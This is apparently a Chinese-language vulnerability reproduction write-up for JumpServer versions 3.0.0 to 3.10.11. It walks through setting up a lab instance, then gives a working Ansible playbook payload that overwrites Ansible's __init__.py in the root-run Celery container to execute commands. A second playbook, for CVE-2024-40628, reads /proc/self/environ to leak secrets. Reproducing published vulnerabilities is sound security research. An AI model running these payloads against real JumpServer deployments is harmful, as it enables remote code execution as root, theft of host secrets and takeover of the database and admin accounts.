漏洞描述
攻击者可利用 Ansible playbook 编写任意文件,从而导致 Celery 容器中的远程代码执行 (RCE)。Celery 容器以 root 身份运行并具有数据库访问权限,允许攻击者窃取主机的所有机密、创建具有管理员权限的新 JumpServer 帐户或以其他方式操纵数据库。
影响版本
v3.0.0-v3.10.11
漏洞复现
环境搭建
1 2 3 4 5 6 7 8 9 10 11
| cd /opt
wget https://github.com/jumpserver/installer/releases/download/v3.10.0/jumpserver-installer-v3.10.0.tar.gz
tar -xf jumpserver-installer-v3.10.0.tar.gz
cd jumpserver-installer-v3.10.0
./jmsctl.sh install
./jmsctl.sh start
|
访问http://hostname即可,默认用户名和密码为admin/admin
该漏洞利用首先需要一个合法的资产主机,在资产管理中创建一个合法资产主机,可测试连接是否正常。
data:image/s3,"s3://crabby-images/04ad5/04ad525655d8250c66644051649f949c3ef81f09" alt="image-20240720104502889"
再到账号列表中创建一个执行账号,该账号需要能登录添加的资产主机。
data:image/s3,"s3://crabby-images/eba40/eba40d9bf85a8e7dbfced589d50156371bad25a4" alt="image-20240720104551643"
最后来到资产授权中,将添加的资产授权给登录用户,即后续要进行漏洞测试的用户。
data:image/s3,"s3://crabby-images/dced2/dced21a5212d8d2b3e3604f5164af6727b560466" alt="image-20240720104641144"
首先创建一个Playbook
data:image/s3,"s3://crabby-images/d48ab/d48ab2b4232aedfe140add87ea277a8f9c69035b" alt="image-20240720105406458"
提交
data:image/s3,"s3://crabby-images/d1746/d17464a33c0765c7fa0593be159cbb1bc5d81722" alt="image-20240720105422131"
更新其活动空间为payload
data:image/s3,"s3://crabby-images/fc17f/fc17f0b44b58f2918d989762efe2b08f098e77df" alt="image-20240720105444754"
1 2 3 4 5 6 7 8 9 10 11
| - hosts: all tasks: - name: create python file on remote host that executes a command shell: | echo 'from ansible.release import __version__, __author__ __import__("os").system("id > /tmp/pwnd")' > /tmp/rce - name: write that file at a known location that gets reloaded at the next ansible execution fetch: src: /tmp/rce dest: /opt/py3/lib/python3.11/site-packages/ansible/__init__.py flat: true
|
运行作业
data:image/s3,"s3://crabby-images/bdcd8/bdcd86c8c5edb9bd894674d7b294609c7644d2b8" alt="image-20240720105645724"
data:image/s3,"s3://crabby-images/3853d/3853d5a8704045aea85579a77d8993af0c14327b" alt="image-20240720105659600"
成功执行命令
data:image/s3,"s3://crabby-images/0513c/0513c396b17eb7552759f2006a65ff5d2c3c9f4e" alt="image-20240720105719462"
data:image/s3,"s3://crabby-images/2e772/2e77293f0f0b2616bc0f2ddbad3da8537b51cf70" alt="image-20240720105734637"
CVE-2024-40628
将活动空间的payload更换为下面这样就行
1 2 3 4 5
| - hosts: all tasks: - name: read file from local host = celery using file lookup plugin ansible.builtin.debug: msg: "{{ lookup('ansible.builtin.file', '/proc/self/environ') }}"
|